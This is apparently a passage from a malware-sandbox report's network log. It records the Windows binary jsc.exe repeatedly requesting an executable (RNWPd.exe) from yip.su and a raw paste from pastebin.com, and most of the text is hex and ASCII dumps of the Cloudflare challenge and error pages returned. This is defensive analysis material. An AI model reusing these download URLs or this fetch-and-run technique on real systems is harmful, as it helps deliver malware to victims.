                                    2024-08-17 22:10:24 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    49192.168.2.549775188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:25 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:25 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:25 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 36 34 7a 59 37 68 62 64 64 36 33 79 6f 73 46 71 5a 53 69 45 2f 74 36 2b 33 50 48 45 63 65 6d 63 48 67 34 55 54 65 6b 36 51 42 6e 4c 68 74 61 51 74 58 4d 45 57 72 46 62 42 50 58 76 4b 32 54 33 51 38 58 79 48 71 68 64 62 36 69 39 56 4b 42 67 41 68 32 74 52 55 4f 6d 47 38 79 39 66 4e 5a 70 45 77 56 41 64 77 55 64 42 49 38 3d 24 64 33 4a 44 51 2f 72 6a 50 68 54 78 49 46 79 74 45 32 6f 34 43 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: 64zY7hbdd63yosFqZSiE/t6+3PHEcemcHg4UTek6QBnLhtaQtXMEWrFbBPXvK2T3Q8XyHqhdb6i9VKBgAh2tRUOmG8y9fNZpEwVAdwUdBI8=$d3JDQ/rjPhTxIFytE2o4Cw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:25 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:25 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:25 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:25 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:25 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:25 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:25 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:25 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 31 38 30 30 32 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 37 64 61 38 61 38 30 66 37 30 27 2c 63 48 61 73 68 3a 20 27 32 30 38 31 32 61 39 37 37 30 61 38 39 66 39 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4e 33 72 6e 74 4c 42 71 36 41 77 4c 45 72 47 67 78 56 31 74 65 43 48 4c 65 56 6f 7a 6c 6f 6a 31 58 54 33 6f 44 31 57 6c 41 7a 73 2d 31 37 32 33 39 33 32 36 32 35 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '18002',cRay: '8b4cfe7da8a80f70',cHash: '20812a9770a89f9',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=N3rntLBq6AwLErGgxV1teCHLeVozloj1XT3oD1WlAzs-1723932625-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:25 UTC1369INData Raw: 56 70 46 52 79 30 58 41 4d 57 51 61 4b 74 52 45 38 4e 48 48 4d 66 71 30 66 38 51 4d 6f 55 72 53 36 56 4e 66 4c 77 73 57 36 4a 67 52 43 66 73 46 4e 72 6b 59 67 6b 58 54 35 7a 30 37 46 42 53 73 79 67 5a 48 30 55 4e 71 63 38 71 4f 71 44 31 76 4a 4b 2e 6c 58 6d 61 2e 4a 66 33 2e 4e 4e 76 50 61 2e 6a 6a 64 78 62 39 6e 5a 2e 39 37 70 67 70 51 2e 67 71 32 6e 52 41 4b 70 38 36 6d 70 50 58 66 4e 58 4f 36 30 76 62 35 72 46 73 55 73 54 6f 55 6d 77 41 73 57 45 6e 2e 56 6f 4b 5a 4b 51 65 69 77 56 39 71 77 6a 53 37 31 64 37 30 34 58 32 73 2e 6e 4e 54 4f 76 4f 6e 5f 76 6e 5f 62 34 4d 42 71 42 47 39 30 30 4e 45 77 54 37 66 62 6a 65 6c 55 31 6e 34 46 2e 78 4c 30 45 77 52 37 53 6e 79 72 72 55 78 41 4f 6c 41 52 68 58 58 61 4c 50 48 6f 64 34 53 47 4a 33 62 63 4d 49 5a 30 34
                                    Data Ascii: VpFRy0XAMWQaKtRE8NHHMfq0f8QMoUrS6VNfLwsW6JgRCfsFNrkYgkXT5z07FBSsygZH0UNqc8qOqD1vJK.lXma.Jf3.NNvPa.jjdxb9nZ.97pgpQ.gq2nRAKp86mpPXfNXO60vb5rFsUsToUmwAsWEn.VoKZKQeiwV9qwjS71d704X2s.nNTOvOn_vn_b4MBqBG900NEwT7fbjelU1n4F.xL0EwR7SnyrrUxAOlARhXXaLPHod4SGJ3bcMIZ04


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    50192.168.2.549776104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:30 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:30 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfe9d49d68cb1-EWR
                                    2024-08-17 22:10:30 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:30 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:30 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:30 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    51192.168.2.549777188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:31 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:31 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:31 UTC677INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 5a 33 33 5a 73 78 69 43 63 55 6d 5a 53 69 54 52 72 41 41 4e 78 53 46 77 68 6c 6c 51 68 67 79 38 38 53 37 46 31 2b 52 46 44 47 6d 75 42 71 69 36 2f 69 69 58 31 66 47 71 4a 46 61 6c 46 36 66 50 61 75 45 61 59 47 56 34 78 73 36 50 5a 57 53 47 59 7a 45 48 4b 66 71 46 33 39 35 4f 64 56 78 78 33 61 64 6a 30 67 54 62 75 50 45 3d 24 41 38 6c 2b 58 43 69 39 34 43 65 69 65 6a 4a 4b 49 73 31 59 59 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
